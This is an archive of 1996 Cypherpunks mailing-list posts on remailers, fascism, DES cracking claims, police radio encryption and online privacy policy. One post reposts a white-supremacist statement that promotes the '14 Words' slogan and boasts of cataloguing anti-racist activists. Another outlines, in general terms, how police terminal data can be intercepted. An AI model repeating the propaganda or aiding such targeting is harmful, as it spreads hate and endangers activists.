 > >were in power when America's prisons were host to some six thousand
 > >pacifists.  I am sure it will be found that we have not been
 > >forgotten.
 > 
 > I propose that there has ALREADY been "the imposition in America of an 
 > oppressive, authoritarian rule."
 > 
 > What are the pacifists doing now?

Nothing -- alas, they don't see the oppression or authority.

For better or worse, America really *is* the most free country.  We
sit here and say how much better it could be, and how awful it is
compared to that.  Others look around and say "Well, you aren't being
carried off in the middle of the night by death squads, so I'm not
going to waste my time on you when I could help other people in danger
of death."  I'm not prepared to argue against that judgement.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ezundel@alpha.c2.org (E. Zundel Repost)
Date: Sat, 8 Jun 1996 14:26:02 +0800
To: cypherpunks@toad.com
Subject: I swear I am not making this up. (rec.music.white-power)
Message-ID: <199606080130.SAA18545@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


From: bb748@FreeNet.Carleton.CA (Milton Kleim)
Newsgroups: news.groups,alt.skinheads,alt.politics.nationalism.white,
            alt.politics.white-power
Subject: Statement Regarding rec.music.white-power
Date: 6 Jun 1996 23:10:41 GMT
Organization: The National Capital FreeNet
Lines: 48
Sender: bb748@freenet3.carleton.ca (Milton Kleim)
Message-ID: <4p7ohh$mq2@freenet-news.carleton.ca>
NNTP-Posting-Host: freenet3.carleton.ca

Now that the results for our newsgroup proposal have been issued, we wish 
to make a statement concerning our objectives.

Three objectives were sought in the rec.music.white-power project:

#1: Generate mainstream media publicity for the Aryan Resistance Movement
    and disseminate the Holy Cause of the 14 Words -- "We must secure the
    existence of our People and a future for White children."

#2: Encourage revelation of Enemy activists' identities to facilitate 
    counter-espionage and prevent many instances of "anti-racist" activism
    against the 14 Words.

#3: Create a newsgroup for discussion and promotion of Aryan music. 

On objective one, we succeeded beyond all expectations.  No informed 
North American is not now unaware of our existence on the Internet.  
National Public Radio, _USA Today_, the _St. Paul Pioneer Press_, and 
Minnesota Public Radio, to name a few media organs, gave us priceless 
free publicity for our ideas and our Holy Cause.

On objective two, we also succeeded well.  We now have a comprehensive 
list of Enemy agents who are active on the Net.  Aryan Corps Counter-
intelligence is now undertaking a classification and cataloguing project 
which will make our counter-espionage efforts much more effective.

On objective three, we obviously failed, but this was expected.  Nonethe-
less, benefit has been gained from this defeat.  The Aryan Corps 
succeeded in organizing hundreds of Aryan Resistance Movement activists 
toward a constructive goal, increasing the "esprit de corps" of our ranks.

We would like to thank all individuals who, for whatever reason, voted in 
the affirmative for our group.

A special thanks is extended to Mr. Michael Handler, our vote-taker, for 
his herculean efforts to process the massive results for our proposal.  
We wish him well.

-- Milton John Kleim, Jr., Proponent, rec.music.white-power; Chief Organi-
                           zer, Aryan Corps

-- White Wolf (RH), Deputy Organizer, Aryan Corps

   And on behalf of the entire Aryan Corps Network.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Sat, 8 Jun 1996 14:36:52 +0800
To: cypherpunks@toad.com
Subject: New type2.list/pubring.mix
Message-ID: <199606072340.SAA01105@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Adams <adamsc@io-online.com>
Date: Sat, 8 Jun 1996 16:46:33 +0800
To: <cypherpunks@toad.com>
Subject: Re: INteresting tidbit
Message-ID: <199606080142.SAA15961@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from stewarts@ix.netcom.com 06/07/96 11:15am pdt  

> >>   4.   The ability to crack DES-1 in near real-time mode is present.
> >>        (See above).
> >First, this has been loosely confirmed for ages. Someone was mentioning
>> that FBI offices supposedly have software that (on a 486) can crack a DES-1 key  
>> in under an hour. Multiply * modern high capacity computers = problem.  
>> However, this does not nessesarily follow from 
> 
> Sigh.  This is of course hopelessly bogus.  You can't even crack RC4/40 in
> under an hour on a 486 machine, thoguh you can do it very fast on custom 
> hardware.

 I figured it had been sensationalized. I received an email from someone who had  
actually played with such a beast (or claimed to have) and I believe he mentioned  
it had an addin card.

> 
> >This Message Was Sent With An UNREGISTERED Version Of PMMail.  
> >Please Encourage Its Author To Register Their Copy Of PMMail.  
> >For More Information About PMMail And SouthSide Software's Other 
> >Products, Contact http://www.southsoft.com.
> 
> I won't encourage you to register it, but at least please find a way to
> quiet the sucker down.  Mailers that do one line of advertising on unregistered
> shareware are semi-tolerable.  Mailers that do 4 lines are highly rude.
> Fortunately, a good binary editor makes it easy to go in and turn the message
> to something quieter, like -'s or :-)'s...

I just did that. Took awhile to find a decent OS/2 email program... I'm not sure  
the new one is better, but it sure is less intrusive.  That and a little bug that  
resulted in some messages getting dumped here (still wondering how it managed  
that) cost them a sale.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 8 Jun 1996 15:30:56 +0800
To: Asgaard <asgaard@sos.sll.se>
Subject: Re: Anonymous stock trades.
In-Reply-To: <Pine.HPP.3.91.960608021535.21836B-100000@cor.sos.sll.se>
Message-ID: <Pine.SUN.3.91.960607190041.20808B-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 8 Jun 1996, Asgaard wrote:

> Who is going to assure that someone has an ownership stake in the
> Humpback Whales? The World Government? Is that entity supposed to
> give the whales to some private whale-watcher's tourism enterprise?
> I don't get it.

When I first was introduced to free market economics, I had the
same sorts of questions (e.g., "who will own the roads?").  If
you keep at it, though, these questions are easily answered.

Rather than give away the answer to Asgaard's question, I'll
propose the following Socratic response:

Who assures that someone has an ownership stake in the ships
that sail the sea?  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 8 Jun 1996 15:39:59 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Fascism is corporatism"
In-Reply-To: <addcfd85030210047ae2@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960607174038.163C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 6 Jun 1996, Timothy C. May wrote:

> At 6:18 PM 6/6/96, Rich Graves wrote:
> >On Wed, 5 Jun 1996, Bruce Baugh, who usually knows better, wrote:
> >
> >> Fascism has no intrinsic link to genocide. It is a theory of economics,
> >> basically, in which the state has ultimate authority over production and
> >> distribution without (as in socialism) actually _owning_ the means of
> ...
> >Yes, I'm afraid these ahistorical myths are widespread. What _do_ they teach
> >in these schools?
> >
> >Pick up anything by Renzo De Felice to gain a basic historical understanding
> >of what fascism was about, from someone who was sympathetic to them.
> 
> Rich, I don't think it nearly so clear as you are claiming. The definition
> of fascism, that is. Without resorting to the usual ploy of quoting
> Webster's (a ploy I usually am not impressed by), let me cite an

Actually, perhaps you *should* check Webster's... you forget that I'm a
Certified Political Scientist. The etymology of fascism is particularly on
point. Historically, it refers to the building of a military vanguard as an
outgrowth of risorgimento, Italy's process of becoming a independent,
unified [fucking] state rather than a bunch of weak city-states, which were
often dominated by French, Prussian, or Austria-Hungarian interests.

In an interesting turn from the theme of this list, Italians from the 1870's
through Mussolini saw a strong, centralized state as the best way to be free
from tyranny and government theft. I'm not much of an historian of Italy,
though, so I won't pursue this point. Besides, it came from a peculiar set
of historical circumstances that CLEARLY do not apply to the US today. 

> "anti-fascist" radio personality, Dave Emory, who I have been listening to
> nearly every week for several years.
> 
> Dave is undeniably anti-fascist, an unusual mixture of left-leaning views
> and National Rifle Association sympathies, and he often quotes Mussolini's
> famous "Fascism is corporatism" line. That is, a view more similar to Bruce

Sounds like my kind of guy. I tend not to be much impressed by radio
personalities, but I may look him up.

"What is fascism" could be batted about forever; I don't think it's much
worth talking about, especially out of historical context. Mussolini started
as a Machiavellian who had not read Machiavelli. Early fascism, and the
etymology of fascism, was a nationalistic, militaristic struggle for power.
Once they got in power, then they started developing an economic ideology.
That's how it works with just about every "political theory"... with the
exceptions of Marxism, libertarianism, and religious fundamentalism,
perhaps.

> Baugh's point that fascism is primarily an economic theory, about the
> organization and ownership of production systems, than about hatred of any
> particular ethnic group.

Of "particular" ethnic groups, probably no. Ezra Pound's antisemitism was
actually pretty unusual. But fascism's essence is rabid, disciplined
nationalism of the militaristic kind. Not really xenophobic and explicitly
genocidal like "National Socialism," which isn't descriptive but was just a
name/party that Hitler was able to hijack to put his extended rant Mein
Kampf into practice, but definitely conscious of the "national character" to
the exclusion of any other. 

> ("Fascism is corporatism" is of course not an overall indictment of all
> corporations. "Corporatism" is basically a view that government should
> identify key industries and corporations and then pick the winners and
> support them while suppressing their competitors. This oversimplifies what
> Mussolini, Emory, myself, etc. mean by "corporatism," but I hope this gives
> at least a glimpse.

That's one glimpse, but I think it's worthwile clarifying that corporatism
isn't about corporations. It's organizing societal groups into officially
recognized corps. Corporatism defines people by their profession, to the
exclusion of any other ties that bind (religion, family, hobbies, political
views, race -- cuz they're all assumed to be of the same "national
character" anyway) and all transactions among the various corps is mediated
by the government. An excellent example of corporatism is Mexico's PRI
(Institutional Revolutionary Party), which is essentially to say the Mexican
government, which is functionally divided into units such as the CTM
(Confederation of Mexican Workers, an umbrella for legally sanctioned trade
unions).

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 8 Jun 1996 13:26:51 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606072307.AA04756@Etna.ai.mit.edu>
Message-ID: <199606072309.TAA18743@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> >He's a Cato fellow. I don't think that implies anything more than
> >he he gets some money from them.
> 
> Nope, he is listed in "senior staff".

He's listed in the staff section, but he's clearly labeled as a
fellow. P.J. O'Rourke is also listed in the same column as a fellow. I
suppose he's working at Cato full time and only moonlights at Rolling
Stone. The fact that neither of them lives within striking distance of
Cato headquarters (O'Rourke lives in New Hampshire) makes your claim
ever more interesting.

> I'm working on digital signature systems under a DARPA contract.

We shall therefore have to declare you to be a U.S. Government employee.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 8 Jun 1996 13:39:19 +0800
To: cypherpunks@toad.com
Subject: Remailer thoughts
Message-ID: <199606080031.TAA04969@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Adam,

Forwarded message:

> From: Adam Shostack <adam@homeport.org>
> Subject: Re: Remailer chain length?
> Date: Tue, 4 Jun 1996 22:57:10 -0500 (EST)
> 
> Jim Choate wrote:
> 
> | > I don't think multiple remailers at the same site help anything.
> | > 
> | 
> | I agree completely. If traffic analysis is going to be done on a single box
> | it isn't going to matter how many remailers are there.  The monitor will
> | simply grab them all. At this point it simply maps them thusly:
> 
> |       incoming message > remailer #1 > .... > remailer #n > outgoing
> | 
> | 
> | That this really maps to is obvious:
> | 
> | 
> |       incoming message > remailer #1-#n > outgoing
> 
> 	Analyzing the traffic through three remailers is more
> difficult than analyzing the traffic through one.  One remailer with
> three N messages per day is more secure than an equivilant remailer
> with N mesasges.


Not if they are on the same box, simply treat the box itself as the
remailer. The internal mechanics are for the most part irrelevant to this
issue. N messages go in, N messages with (number of remailers)(# of cover
traffic/real message) messages of cover. My contention is that it does not
matter how many remailers are on a single box. It is the number of
connections in and out of the box available. The above equation is clearly
linear and therefore not what I would consider computationaly challenging.

If I may introduce some terminology (unless their is an existing stnd.),

x       number of messages
y       message multiplier
N#()    remailer number #
R#()    number of remailers on machine #
C()     number of cover messages/original messages
E#      number of connections on machine #
T()     total traffic through remailer system
$i()    cost per message, incoming
$o()    cost per message, outgoing
C       fixed cost items of operation (eg rent)

Note: each of these represent a family of functions.

My contention:

T(R#(n)) is equivalent to T(R#(N1(x), N2(x)..., Nn(x))) 

Where,

T() = R#(n)(2N#(x) + C(yN#(x)))

The term 2N#(x) represents the number of valid messages the remailer
handles. x incoming & x outgoing, hence 2x.

The total income of such a remailer:

$(T(x))=$i(x)-$o(T(x)-x)-C

It is important to recognize the profit dependancy on the input/output
message ratio. If it gets too high, you got nothing to spend on yourself.

Your contention (if I may translate):

N1(3x) is more secure than N1(x), assuming identical remailer configuration.

Do you consider N#(ax) equivalent to aN#(x)? May I inquire into your
reasoning?

> [much good thought deleted.]
> 
> |         5. Automaticaly limits spamming unless a remailer allows cloning
> |            AND all recipients share a commen private key.
> 
> 	Or unless the remailer mails to a mail to news gateway.

This is a limitation of the mail-news gateway and not of the remailer
technology. What it points to is a serious shortcoming in mail-news gateway
software. The technology required for truely efficient newsgroup handling is
something sorely in need of work.

> |         6. It maps 1:1 onto the physical remailer model with the same limits
> |            on information at each stage. This allows one to directly apply
> |            the current history of precedence involving anonymity and
> |            physical remailers.
> 
> 	With physical remailers, you can open the inner envelopes and
> read the message, leaving the end user to wonder where the post office
> lost the message.  With 'real' remailers, the lost message can't be
> read, only not delivered.

If the encryption technology is secure. The point I am making here is that
the encryption envelope is 'secure' only so long as nobody is trying to
crack it. Sooner or later somebody is going to decrypt your message, if not
the entire encryption system. This is synonymous with the physical model. The
paper envelope is secure as long as somebody isn't breaking the law by
tampering with the mail.
 
> | This is the basic model that the Austin Cypherpunks are working on at the
> | currrent time. The big problem we have right now is determining if the body
> | is actualy encrypted. We have done some basic tests of encryption-spoofing
> | using pgp and it is looks to be a thorny problem. It simply is not trivial
> | to look at a block of characters and determine if they are actualy
> | encrypted. You can't rely on the wrapper around the data put there by the
> 
> 	I'm not sure I see why this matters?  If you check that the
> message is not obviously readable, why not assume that its well
> encrypted?  You're rarely required to contort yourself to ensure your
> customers are obeying the law (weaponsmiths, cryptographers, and banks
> excepted.)  

Ok. Let's for a moment assume that to send a message to
'president@whitehouse.gov' with 'Die Bill!' is a crime. Would it not be a
crime to foil a packet of encryption by inserting 'Die Bill!' messages in
clear text in the encryption block? To date, provided no attempt at actual
decryption is attempted, there is nothing in the standards that prevent this
other than digital signatures. And again, a specific program has to be
executed. A person might very well look at it as plaintext w/o ever running
digital signatures (or they just assume its always right). Would this also
be a crime?

                                                      Jim Choate

       "Reality is observer dependant"
                              \
                                \   \\/////
                                    |     | 
                                    (.) (.)
      ===========================oOO==(_)==OOo==========================             

         Tivoli an IBM company                  CyberTects: SSZ
         Customer Support Engineer              SOHO Consulting/VR/Robotics

         9442 Capitol of Texas Highway North    1647 Rutland
         Suite 500                              #244  
         Austin, TX 78759                       Austin, TX  78758

         Email: jchoate@tivoli.com              Email: ravage@ssz.com
         Phone: (512) 436-8893                  Phone: (512) 259-2994
         Fax:   (512) 345-2784                  Fax: n/a
         WWW:   www.tivoli.com                  WWW: www.ssz.com
         Modem: n/a                             Modem: (512) 836-7374
         Pager: n/a                             Pager: n/a
         Cellular: n/a                          Cellular: n/a

      ===================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yanni <jon@aggroup.com>
Date: Sat, 8 Jun 1996 14:24:37 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: E-Data Systems ~ patent #4,528,643
Message-ID: <9606071941.AA57813@jon>
MIME-Version: 1.0
Content-Type: text/plain


> I think this has made the rounds here, already.
>
> If it hasn't, any comments?
>
> Cheers,
> Bob Hettinga

yea, we got a couple of them from those guys...

whatever...

how can you claim a patent on that stuff?

geeezzz...

-jon

Jon (no h) S. Stevens        yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
What I just wrote is beta. Please report all bugs directly to me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 8 Jun 1996 11:58:43 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606072309.TAA18743@jekyll.piermont.com>
Message-ID: <9606072345.AA04810@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry,

BTW, its not normally polite to post comments on personal mail to a 
list. I thought the list had probably got bored with this nonsense long
ago.

> The fact that neither of them lives within striking distance of
>Cato headquarters (O'Rourke lives in New Hampshire) makes your claim
>ever more interesting.

Being listed as staff in my view makes one a staff member. 

There have been interesting developments in telecommunications which
make it no longer necessary to physically reside where one works.

When I was a CERN fellow I was certainly on the payroll of CERN - 
generally that is what "Fellow" means.

If Perry wishes to call me a fool for calling a person listed by the Cato 
Institute as a member of their "staff" a member of the Cato institute staff then 
I guess Perry has a different deffinition of "fool";.



	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 8 Jun 1996 09:31:54 +0800
To: cypherpunks@toad.com
Subject: Internet solution for law enforcement
In-Reply-To: <199606071900.MAA12968@hopf.dnai.com>
Message-ID: <19960607194629.14482.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


caal@hopf.dnai.com writes:
 > Has anyone seen this yet?  Looks like it's two weeks old.  Internet Police!

Hey, I went into the local New York State Police station and asked if
they had email.  The answer is basically "No."  They've got something
like a telex system.  I doubt that they're any encryption on their
data services.  You'd think that police department RADIOS would at
least be encrypted!  Thanks, TLAs, for your crime encouraging efforts.
[ TLA lurkers should have the grace to wince at that. ]

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 8 Jun 1996 15:54:30 +0800
To: nelson@crynwr.com
Subject: Re: Internet solution for law enforcement
In-Reply-To: <19960607194629.14482.qmail@ns.crynwr.com>
Message-ID: <9606080052.AA12694@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


 Russ Crynwr writes:

> Hey, I went into the local New York State Police station and asked if
> they had email.  The answer is basically "No."  They've got something
> like a telex system.  I doubt that they're any encryption on their
> data services.  You'd think that police department RADIOS would at
> least be encrypted!  Thanks, TLAs, for your crime encouraging efforts.
> [ TLA lurkers should have the grace to wince at that. ]

	Actually there is quite a strong school of thought that holds
that police should be discouraged from using hard encryption on their
radios because that makes it impossible for the media and public to keep
an eye on them to make sure that they are on the up and up.  Remember 
that policeman carry guns and have wide discression in what they can do
in many situations, especially in short term immediate situations. And
quite a few are not well educated or terribly bright. And most members
of the general public are inclined to believe the word of police rather
than some random citizen.
 
	A hard encrypted police radio system restricts public
information about police activities largely to what the police chooses
to voluntarily reveal to the media - and given the self promoting
political games, corruption, fabrication of evidence, brutality, racism
and plain stupidity that characterize all too many police departments
that often is not enough and very very self serving.  Leaving police
radio communications at least mostly open allows the media and curious
citizens to follow and observe police actions and have enough knowlage
of what went on to ask the hard questions and be witnesses to the
actual events.

	Many police radio systems have been deliberately left open in
recent years even as digital DES based technology has become practical and
somewhat affordable and widely installed.  Lots of police departments
have agreed or been forced to not encrypt anything but sensitive
undercover surveillance related coms, and certain tactical coms in
crisis situations such as hostage takings.  (It still remains also true,
however, that digital voice radios systems have less range, penetrating
power and more unpredictable outages and dead spots than good old analog
fm systems do so there is an added benefit to not using encryption).

	And most police officers seem to believe that allowing the
public to listen to their communications is a net plus - there are
apparently few known instances of criminals making particularly
effective use of scanners to thwart the police and lots of instances of
citizens spotting suspects and other suspicious activities and informing
the police because they knew they were interested from what they
overheard listening to a scanner.
                  
	As for police digital communications (the so called MDT
terminals installed in many police cruisers) - the older and larger city
systems installed mostly by big companies such as Motorola use feeble or
non existant encryption and can be readily intercepted by a slightly
modified scanner (using radio shack parts) and a PC with suitable
software (though the baud rates are odd, the data format synchronous
rather than start-stop async, the messages mostly sent in the form of
packed codewords in some BCH or Reed Soloman error correcting code with
the data bits strangely distributed in the codeword for best error
immunity, and the actual data a hodgepodge mixture of ASCII text and
binary screen formating and control characters).

	The MDT systems installed in smaller towns and more recently by
a small company founded by a former colleague of mine (K1EA) that use
standard laptops instead of proprietary terminals do use single DES
encryption (my pro-crypto rantings on slow afternoons many years ago may
have had some effect). I don't know how good the key management is - I
keep meaning to ask Ken the next time I see him at a hamfest - but at
least the data is not sitting there for the taking by anyone with a PC,
a scanner, and some reasonably straightforward DOS software.

	I have been told that interconnecting non secure digital terminal
systems with the various federal and state criminal data base systems
such as NCIC and its successors that contain sensitive non public information
such as criminal histories and arrest records is supposed to be illegal.
It is not clear how completely this rule is observed.
                                                        
	Crypto in the real world raises some interesting issues - the
nazis or fascists in the evil sense in the future will certainly make
very effective use of it to do evil.

							Dave Emery
							die@die.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Be Good)
Date: Sat, 8 Jun 1996 17:05:46 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: ID this 31173 NCR keyboard
In-Reply-To: <199606070859.BAA16976@mail5>
Message-ID: <199606080415.VAA24937@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Does it have any identifying numbers?

There's a bunch of labels and printings inside
the board, the pc board says ELE 2001;
the chip says NCR '82 and 31960;
and a couple labels on the inside of
the case that don't make any sense.

Do I have any chance of getting term
support for this, or getting a new
keyboard like this?  It seems ideal.

> NCR OEMed a line of ADDS Viewpoint terminals for a while,
> and while the numbers no longer come to mind
> (unless they're like 2920), they might look familiar
> if I saw them.  This keyboard sample doesn't look
> quite like them, though.  Most of their keyboards
> like that were for terminals, not for PCs.
> Are the connectors even PC-like?

The connector and cable is standard XT-like.

> Also, if there are function keys through F20, it might very
> well be a 3270-emulator of some sort.
> 
> At 01:52 PM 6/6/96 -0700, you wrote:
> >Oops.  I wrote that just looking at the keyboard.
> >Picked it up at Seattle's Ex-Pc for $3.
> >It's so old, I think it requires a non-PC BIOS.
> >No manual, labels etc.
> >
> >Anyone have a clue as to what this is:
> >
> >NCR
> >
> >F1 F2          [...]               F18 F19 F20/RESET|
> >ESC            [...]     TAB             |[five direction keys]
> >CONTROL Q      [...]     }/] CONTROL     |CLR 7 8 9 /
> >CAPS_LOCK A    [...]      ~/` |NEW       |  - 4 5 6 *
> >[up] |/\ Z     [...]   [upup] |LINE      |  + 1 2 3 |NEW
> >               [space]                   |  0_ 00 . |LINE
> >
> >It was designed for easily customizing your keytable,
> >being an actual flat terminal with square keys easily
> >pulled out and interchanged.
> >
> >The back of the keyboard has three switches for
> >the boolean selection of languages: US English,
> >UK/Int. English, French, German, Swedish/Finnish,
> >Danish/Norwegian, Spanish, Italian.
> >
> >So, where to get a NEW keyboard like this:
> >
> >FLAT, with a full set of SQUARE, EASILY pulled out keys.
> >
> >
> >
> #				Thanks;  Bill
> # Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
> # http://www.idiom.com/~wcs
> #				Rescind Authority!
> 
> 


-- 

Kill Your Television





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Sat, 8 Jun 1996 15:26:02 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.23 - Congress/FTC Focus on Online Privacy Issues
Message-ID: <v02140b0badde8519e0ee@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 23
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 23                         June 7, 1996

 CONTENTS: (1) Congress/FTC Focus on Online Privacy Issues - Solutions Differ
           (2) Text of EFF, CDT, PFAW, VTW Letter to Rep. Franks (R-NJ)
                on impact of "Children's Privacy" Bill
           (3) Join Senator Burns Live Online June 11, 10pm ET
           (4) How to Subscribe/Unsubscribe
           (5) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------

  ** UPDATE: DECISION IS NEAR IN FIGHT TO SAVE FREE SPEECH ONLINE **

  An announcement from the Court is expected any time. Be sure to visit
     http://www.cdt.org/ciec/ for the latest news and information!

-----------------------------------------------------------------------------
(1) CONGRESS/FTC FOCUS ON ONLINE PRIVACY - OFFER DIVERGENT SOLUTIONS

The increasing use of the Internet by children, combined with the ease of
collecting personal information online, raise serious privacy issues.
However, while there is broad consensus on the goal of giving people more
control over the collection and use of personal information online, some of
the solutions being offered may have far-reaching, though perhaps
inadvertent, impact on the free flow of information in interactive media.

Over the past several months, concerns about the availability and use of
personal information in the online world, particularly with respect to the
collection and use of information about children, have prompted the
Congress and the Federal Trade Commission (FTC) to seriously consider this
important issue.

The approaches to this issue fall broadly into two distinct categories:

* Create Criminal Penalties For The Collection And Use Of Personal
  Information About Kids Without Parental Consent.

* Encourage The Development And Use Of Technologies That Enable Users
  and Parents To Limit The Amount Of Personal Information They and Their
  Children Reveal Online.

Legislation designed to restrict the collection and use of personal
information about children without parental consent was recently introduced
by Rep Bob Franks (R-NJ). The bill has sparked concerns from cyber-rights
advocates that it may end up increasing the collection of personal
information online and result in restrictions on the free flow of
information (see the attached letter from EFF, People for the American Way
Action Fund, VTW, and CDT below).

Recent hearings before the FTC emphasized the broad consensus about the need
to give individuals more control over the collection and use of personal
information. The FTC hearings highlighted the availability of technologies
which empower users and parents to exercise more control over the collection
and use of such information, and the possibility that existing methods,
including the PICS standards, can be enhanced to enable users to express
preferences about how and to what extent they are willing to have personal
information reused (although much work needs to be done before this is fully
implemented).

In addition, Rep. Ed Markey (D-MA), a long time champion of privacy issues,
told the FTC panel that he would like to encourage the development of
technologies that enable users to control the amount of personal
information they reveal online. Markey also emphasized that Congress should
consider legislation in this area if such technologies are not developed or
are not effective.  Markey told the FTC:

 "We should see if there are technological tools that can empower
  consumers. Where they don't exist, or where a particular industry
  refuses to embrace this code of electronic ethics in a way that solves
  this problem, then the government is obliged to step in and do
  something."

Markey also announced that he intends to introduce legislation soon to give
consumers the right to know that information is being collected about them,
notice that personal information may be reused or sold, and the right to
say "no" to the reuse or sale of their personal information.  Markey's
legislation would also commission a study of existing online privacy
practices (The full text of Rep. Markey's statement is available at CDT's
privacy issues web page URL below.)

The FTC hearings illustrated that there is broad concern about the
collection and use of personal information online. There was also great
substantial support expressed for technological solutions to address this
issue.  As a result, the FTC has requested that the industry report back to
the Commission in 6 months on progress towards developing technologies that
enhance user control over the collection and use of personal information
online.

CDT is encouraged that Congress and the FTC have taken such strong interest
in the issue of online privacy, and we look forward to working with all
interested parties to ensure that solutions give users control over the
collection and use of personal information and do not adversely affect the
free flow of information online.

More information, including CDT's testimony before the FTC panel and Rep.
Markey's statement, and a demonstration illustrating the amount of personal
information collected during the normal course of surfing the Web, can be
found at CDT's Privacy Issues page:

   http://www.cdt.org/privacy/

-----------------------------------------------------------------------

(2) Letter from EFF, PFAW Action Fund, VTW & CDT to Rep. Bob Franks
    Regarding "Children's Privacy" (HR 3508) Bill

The following letter was sent last week to Representative Bob Franks (R-NJ)
regarding the "Children's Privacy Protection and Parental Empowerment Act"
(HR 3508) from the Electronic Frontier Foundation, People for the American
Way Action Fund, the Voters Telecommunications Watch, and the Center for
Democracy and Technology.

Among other things, the groups expressed concern that, as currently
drafted, the bill raises some of the same privacy and free flow of
information issues raised by the Exon/Coats "Communications Decency Act" to
the extent that it is extremely difficult to know whether or not a person
visiting a web site is or is not a child without requiring all visitors to
identify themselves.

While commending Rep. Franks for his efforts and expressing support for the
goal of his legislation, the letter outlines several concerns about the
impact of the bill on the Internet.  The groups pledged to work with Rep.
Franks and other interested members of Congress to explore technological
solutions which empower users and parents to control the use of personal
information and preserve the free flow of information.

The Franks bill enjoys broad support from a number of conservative
"pro-family" groups such as the Christian Coalition, Enough Is Enough!, and
the National Law Center for Children and Families, as well as privacy
groups such as EPIC, Privacy Times Publisher Evan Hendricks and Privacy
Journal Publisher Robert Ellis Smith.

The text of HR 3508 is available at: http://www.cdt.org/privacy/children/

The full text of the letter from EFF, PFAW Action Fund, VTW and CDT follows:

----------
June 4, 1996

Representative Bob Franks
429 Cannon House Office Building
Washington, DC 20515

Dear Representative Franks:

We are writing to commend your efforts to protect children's privacy.
We are pleased that you have begun a process to put these important issues
at the center of the political debate. We believe, however, that the
solutions recommended in your bill, -- the "Children's Privacy Protection
and Parental Empowerment Act" (HR 3508) -- particularly as they relate to
the exchange of information on the Internet, will not only increase the
collection of information about children in certain circumstances but will
also criminalize behavior in a vast array of unintended situations, thereby
compromising the free flow of information online.

With the rising popularity of the Internet and commercial online
services, concerns regarding the vulnerabilities of unsupervised children's
activities online must be addressed. Indeed, although the Internet offers
